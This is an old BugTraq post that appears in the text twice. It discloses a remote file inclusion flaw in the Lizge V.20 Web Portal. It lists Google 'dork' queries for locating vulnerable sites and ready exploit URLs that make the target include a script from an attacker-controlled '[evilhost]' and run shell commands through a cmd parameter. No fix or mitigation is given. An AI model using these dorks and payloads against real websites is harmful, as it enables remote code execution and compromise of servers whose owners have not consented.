BugTraq
Back to list
|
Post reply
Lizge V.20 Web Portal File Include Vulnerability
Aug 15 2006 07:24PM
crackers_child sibersavascilar com
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
------------------------------------------------------------------------
--------
Title : Lizge V.20 Web Portal File Include Vulnerability
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Affected software description :
------------------------------------------------------------------------
--------
Application : Lizge V.20 Web Portal
URL : http://www.lizge.com
------------------------------------------------------------------------
--------
dork :allinurl:"index.php?lizge=
:allinurl:"index.php?bade=
------------------------------------------------------------------------
--------
Usage:
http://[target]/[lizge_path]//index.php?lizge=http://[evilhost]/cmd.txt?
&cmd=ls
http://[target]/[lizges_path]//index.php?bade=http://[evilhost]/cmd.txt?
&cmd=ls
------------------------------------------------------------------------
--------
greets:
X_ALPEREN_X,Root_MOr And All Other Friends
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
------------------------------------------------------------------------
--------
Title : Lizge V.20 Web Portal File Include Vulnerability
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Affected software description :
------------------------------------------------------------------------
--------
Application : Lizge V.20 Web Portal
URL : http://www.lizge.com
------------------------------------------------------------------------
--------
dork :allinurl:"index.php?lizge=
:allinurl:"index.php?bade=
------------------------------------------------------------------------
--------
Usage:
http://[target]/[lizge_path]//index.php?lizge=http://[evilhost]/cmd.txt?
&cmd=ls
http://[target]/[lizges_path]//index.php?bade=http://[evilhost]/cmd.txt?
&cmd=ls
------------------------------------------------------------------------
--------
greets:
X_ALPEREN_X,Root_MOr And All Other Friends
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]